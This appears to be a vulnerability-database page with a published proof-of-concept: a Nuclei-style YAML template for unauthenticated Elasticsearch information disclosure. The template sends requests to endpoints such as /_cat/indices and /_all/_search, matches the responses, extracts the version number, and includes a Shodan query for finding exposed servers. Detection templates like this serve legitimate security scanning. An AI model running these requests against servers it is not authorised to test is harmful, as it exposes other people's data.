漏洞描述
Internal information is exposed in elasticsearch to external users.
elasticsearch: ElasticSearch Information Disclosure
PoC代码[已公开]
id: elasticsearch
info:
name: ElasticSearch Information Disclosure
author: Shine,c-sh0,geeknik
severity: low
description: Internal information is exposed in elasticsearch to external users.
classification:
cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: elasticsearch
product: elasticsearch
shodan-query: "ElasticSearch"
tags: elastic,unauth,elasticsearch,misconfig,vuln
http:
- method: GET
path:
- '{{BaseURL}}/?pretty'
- '{{BaseURL}}/_cat/indices?v'
- '{{BaseURL}}/_all/_search'
- "{{BaseURL}}/_cluster/health?pretty"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '"took":'
- '"number" :'
- '"number_of_nodes"'
condition: or
- type: word
part: header
words:
- application/json
- application/vnd.api+json
- text/plain
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"number"\s:\s"([0-9.]+)"'
# digest: 4a0a004730450221008b7d2c71084cea8d7a66ad841642e56c2fc5692b0220fca906916dd5578cbb48022016593f443bcd039bfdd6062440952d0d775b7c46eebec8c243fa8d93d214eb44:922c64590222798bb761d5b6d8e72950